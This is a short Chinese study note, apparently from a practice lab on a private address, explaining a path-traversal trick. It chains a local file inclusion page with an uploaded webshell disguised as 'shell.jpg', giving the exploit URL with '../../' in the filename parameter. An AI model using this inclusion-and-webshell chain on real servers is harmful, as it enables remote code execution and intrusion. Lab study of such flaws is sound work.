…/…/跨目录问题自己的总结
有文件包含漏洞的地址
http://192.168.0.104/06/vul/fileinclude/fi_local.php?filename=file2.php&submit=1
有webshell的图片地址:
http://192.168.0.104/06/vul/unsafeupload/uploads/shell.jpg
利用:
http://192.168.0.104/06/vul/fileinclude/fi_local.php?filename=…/…/unsafeupload/uploads/shell.jpg&submit=1
/vul/fileinclude/fi_local.php
../../移动到 /vul 目录下 再接着写图片地址/unsafeupload/uploads/shell.jpg
最后访问的结果即:
/06/vul/unsafeupload/uploads/shell.jpg
